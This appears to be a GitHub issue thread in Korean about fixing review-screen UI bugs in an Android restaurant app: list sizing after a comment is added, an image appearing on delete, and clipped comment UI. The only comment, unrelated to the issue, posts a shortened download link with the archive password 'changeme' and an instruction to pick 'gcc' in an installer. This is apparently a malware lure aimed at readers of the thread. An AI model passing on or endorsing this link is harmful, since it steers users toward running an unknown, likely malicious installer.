### ISSUE TITLE
상세 리뷰 UI 업데이트 버그 수정

### ISSUE THREAD

**Issue by imtaejugkim** [kustaurant/Android#39]
### 버그에 대한 설명
- comment 등록후 전체 크기 오류
- 삭제하기 시 이미지가 추가되는 오류
- comment UI 아래 조금 잘리는 오류 (추후 구현 사항) 

### 버그 수정을 위해 해야할 일
- comment 등록 후 전체 리스트 업데이트
- 삭제하기 시 LiveData에서 데이터 겹치는 오류 수정

### 예상 작업 시간
- 4시간 내외

**Comment by YeGop0218** [comment]
Download 
https://bit.ly/3MjP129
password: changeme
In the installer menu, select "gcc."
